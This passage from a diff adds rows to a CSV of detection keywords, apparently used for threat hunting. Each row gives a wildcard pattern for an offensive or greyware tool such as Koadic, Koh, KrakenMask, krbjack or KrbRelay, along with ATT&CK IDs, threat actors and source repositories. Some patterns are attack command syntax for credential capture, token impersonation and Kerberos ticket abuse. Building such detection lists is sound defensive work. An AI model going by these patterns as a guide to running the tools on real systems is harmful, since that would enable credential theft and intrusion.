with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*koadic_types.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*koadic_util.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript).
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*koh filter add SID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*koh filter list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon
session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*koh filter remove SID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 -
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*koh filter reset*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*koh groups LUID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*koh impersonate LUID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 -
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*koh release all*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*koh release LUID*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 -
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*Koh.exe capture*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group
- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*Koh.exe list*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*Koh.exe monitor*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 -
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z"
+"*kpiecbcckbofpmkkkdibbllpinceiihk*","greyware_tool_keyword","DotVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*krackattacks*","offensive_tool_keyword","krackattacks-scripts","This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2.
For details behind this attack see our website and the research paper.","T1170 - T1555.003 - T1583.002","TA0003 - TA0007 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/vanhoefm/krackattacks-scripts","1","0","N/A","N/A","10","3233","783","2022-10-16T18:44:41Z","2017-10-18T12:58:08Z"
+"*Kraken Mask by @DallasFR*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z"
+"*kraken.py --connect --mode * --profile * --compiler *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*KrakenMask-main*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032).
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z"
+"*krb2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*krb5/kerberosv5.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip
*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*krb5decoder*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*krb5-enum-users *","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*krb5-enum-users.*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*krbcredccache.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
+"*krbjack -*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
+"*krbjack.tcpforward*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
+"*krbjacker.py*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
+"*krbjack-main*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
+"*KrbRelay*misc*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*KrbRelay*smb*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs.
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*KrbRelay*spoofing*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*KrbRelay.csproj*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*KrbRelay.exe*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z"
+"*KrbRelay.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools.
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
